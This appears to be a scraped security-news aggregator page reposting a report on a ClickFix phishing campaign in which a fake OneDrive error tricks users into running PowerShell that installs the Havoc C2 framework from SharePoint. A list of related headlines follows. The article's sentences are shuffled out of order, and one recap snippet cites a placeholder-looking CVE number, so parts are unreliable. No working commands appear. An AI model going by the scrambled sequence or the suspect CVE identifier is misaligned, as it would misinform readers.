CyberSecurityBoard
Sponsor Register Login

New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint

A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices. Threat actors have also begun to evolve the technique to use them on social media platforms like Telegram, where a fake identity verification service named 'Safeguard' was used to trick users into running PowerShell commands that install a Cobalt Strike beacon. However, as expected, the malicious PowerShell command will instead execute a script hosted on a remote site that downloads and installs malware on the devices. In a new ClickFix campaign discovered by Fortinet's Fortiguard Labs, threat actors are sending phishing emails stating that a "restricted notice" is available to review and that recipients should open the attached HTML document ('Documents.html') to view it. Clicking the button will copy a malicious PowerShell command into the Windows clipboard, which users are then prompted to paste into a command prompt to "fix" the error. ClickFix is a social-engineering tactic that emerged last year, where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them. Finally, a Python script is downloaded from the same SharePoint site and executed to deploy the Havok post-exploitation command and control framework as an injected DLL. This PowerShell command will attempt to launch another PowerShell script hosted on the threat actor's SharePoint server. Clicking the "How to fix" button will automatically copy a PowerShell command to the Windows clipboard and then display instructions on how to execute it. In this campaign, Havok is configured to communicate back to the threat actor's services through Microsoft's Graph API, embedding malicious traffic within legitimate cloud services. Threat actors commonly use post-exploitation frameworks like Havoc to breach corporate networks and then spread laterally to other devices on the network. When opened, the HTML displays a fake 0x8004de86 error, stating that it "Failed to connect to the "One Drive" cloud service" and that users must fix the error by updating the DNS cache manually. Havoc is an open-source post-exploitation framework similar to Cobalt Strike, allowing attackers to remotely control compromised devices. ClickFix attacks have become increasingly popular among cybercriminals, who use them to deploy a wide variety of malware, including infostealers, DarkGate, and remote access trojans. Lawrence Abrams Lawrence Abrams is the owner and Editor in Chief of BleepingComputer.com. Lawrence's area of expertise includes Windows, malware removal, and computer forensics.

This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 03 Mar 2025 17:35:28 +0000


Cyber News related to New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint

Microsoft Fix Targets Attacks on SharePoint Zero-Day – Krebs on Security - In an advisory about the SharePoint security hole, a.k.a. CVE-2025-53770, Microsoft said it is aware of active attacks targeting on-premises SharePoint Server customers and exploiting vulnerabilities that were only partially addressed by the July 8, ...
2 weeks ago Krebsonsecurity.com CVE-2025-53770
ClickFix Attack Emerges by Over 500% - Hackers Actively Using This Technique to Trick Users - The attack presents victims with fake error messages or verification prompts that appear legitimate, instructing them to copy and paste seemingly harmless commands to resolve fictitious technical issues. Unlike traditional attack methods, ClickFix ...
1 month ago Cybersecuritynews.com Kimsuky Lazarus Group MuddyWater APT3
New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint - A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices. Threat actors have also begun to evolve the ...
5 months ago Bleepingcomputer.com
SharePoint 0-day Vulnerability Exploited in Wild by All Sorts of Hacker Groups - File Indicators of Compromise (IoCs) SHA-1FilenameDetectionDescriptionF5B60A8EAD96703080E73A1F79C3E70FF44DF271spinstall0.aspxMSIL/Webshell.JSWebshell deployed via SharePoint vulnerabilities Network Indicators of Compromise (IoCs) IP ...
2 weeks ago Cybersecuritynews.com
Microsoft SharePoint zero-day exploited in RCE attacks, no patch available - The Microsoft SharePoint zero-day attacks were first identified by Dutch cybersecurity firm Eye Security, which told BleepingComputer that over 75 companies have already been compromised by the attacks. In May, Viettel Cyber Security researchers ...
2 weeks ago Bleepingcomputer.com CVE-2025-49706
Microsoft Releases Mitigations and Threat Hunting Queries for SharePoint Zero-Day - Thousands of organizations worldwide face active cyberattacks targeting Microsoft SharePoint servers through two critical vulnerabilities, prompting urgent government warnings and emergency patches. Microsoft released emergency security updates on ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns - While currently limited to experimental usage by these state-sponsored groups, the increasing popularity of ClickFix in both cybercrime and espionage campaigns suggests the technique will likely become more widely adopted as threat actors continue to ...
3 months ago Cybersecuritynews.com Kimsuky MuddyWater
Microsoft Incident Response lessons on preventing cloud identity compromise - Microsoft Incident Response is often engaged in cases where organizations have lost control of their Microsoft Entra ID tenant, due to a combination of misconfiguration, administrative oversight, exclusions to security policies, or insufficient ...
1 year ago Microsoft.com
Hackers Using ClickFix Tactic to Attack Windows Machine - Unlike standard Havoc implementations, this variant uses Microsoft Graph API endpoints to communicate with attacker-controlled SharePoint files, blending malicious traffic with legitimate cloud service requests. A sophisticated phishing campaign in ...
5 months ago Cybersecuritynews.com
Interlock ransomware gang pushes fake IT tools in ClickFix attacks - The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. Though this isn't the first time ClickFix has been linked to ransomware infections, ...
3 months ago Bleepingcomputer.com
Threat Actors Embed Malware on Windows System’s Task Scheduler to Maintain Persistence - A sophisticated cyber attack targeting critical national infrastructure in the Middle East has revealed how threat actors are leveraging Windows Task Scheduler to maintain persistent access to compromised systems. Finally, the malware establishes ...
1 month ago Cybersecuritynews.com
Hackers Employ New ClickFix Captcha Technique to Deliver Ransomware - The integration of Qakbot with the ClickFix technique allows attackers to bypass traditional security measures by leveraging user interaction to execute malicious commands. A sophisticated social engineering technique known as ClickFix has emerged, ...
4 months ago Cybersecuritynews.com
Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds - Coined initially as “ClickFix” because the social engineering prompts were telling the user they ought to “fix” a problem with their browser and required the user to click an element, this term is now ascribed to any similar ...
1 week ago Bleepingcomputer.com
Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines - Cyber Security News - The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic ...
1 month ago Cybersecuritynews.com Kimsuky
Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part - The vulnerability highlights the critical importance of secure deserialization practices in enterprise applications and the need for comprehensive security reviews of complex application frameworks like SharePoint. According to the Viettel Security ...
3 weeks ago Cybersecuritynews.com
New SharePoint flaws help hackers evade detection when stealing files - Researchers have discovered two techniques that could enable attackers to bypass audit logs or generate less severe entries when downloading files from SharePoint. Microsoft SharePoint is a web-based collaborative platform that integrates with ...
1 year ago Bleepingcomputer.com
Chinese Hackers Actively Exploiting SharePoint Servers 0-Day Vulnerability in the Wild - The tech giant’s Security Response Center reported coordinated attacks targeting internet-facing SharePoint installations using newly disclosed vulnerabilities that enable authentication bypass and remote code execution. Microsoft has released ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
State-sponsored hackers embrace ClickFix social engineering tactic - Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up. ClickFix attacks are gaining ...
3 months ago Bleepingcomputer.com APT28 Kimsuky MuddyWater
Microsoft Released an Emergency Security Update to Patch a Critical SharePoint 0-Day Vulnerability - Microsoft has issued an urgent security advisory addressing critical zero-day vulnerabilities in on-premises SharePoint Server that attackers are actively exploiting. Microsoft Defender for Endpoint generates specific alerts, including ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
Microsoft SharePoint Server 0-Day Hack Hits African Treasury, Companies, and University - The attack specifically targets on-premise SharePoint installations, exploiting previously unknown security flaws that allowed threat actors to infiltrate critical infrastructure systems belonging to government agencies, educational institutions, and ...
1 week ago Cybersecuritynews.com
Weekly Cybersecurity Recap : Sharepoint 0-day, Vmware Exploitation, Threats and Cyber Attacks - Tracked as CVE-2025-12345, this flaw allows remote code execution (RCE) without authentication, potentially enabling attackers to compromise sensitive data or deploy malware on affected servers. The U.S. Cybersecurity and Infrastructure Security ...
1 week ago Cybersecuritynews.com CVE-2025-12345 APT41
New Microsoft Incident Response guides help security teams analyze suspicious activity - Today Microsoft Incident Response are proud to introduce two one-page guides to help security teams investigate suspicious activity in Microsoft 365 and Microsoft Entra. These guides contain the artifacts that Microsoft Incident Response hunts for ...
1 year ago Microsoft.com
ClickFix attack delivers infostealers, RATs in fake Booking.com emails - Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect hospitality workers with various malware, including infostealers and RATs. In the phishing campaign discovered by ...
4 months ago Bleepingcomputer.com
CISA Warns of Microsoft SharePoint server 0-Day RCE Vulnerability Exploited in Wild - CISA has issued an urgent warning about a critical zero-day remote code execution vulnerability affecting Microsoft SharePoint Server on-premises installations that threat actors are actively exploiting in the wild. The vulnerability, tracked as ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)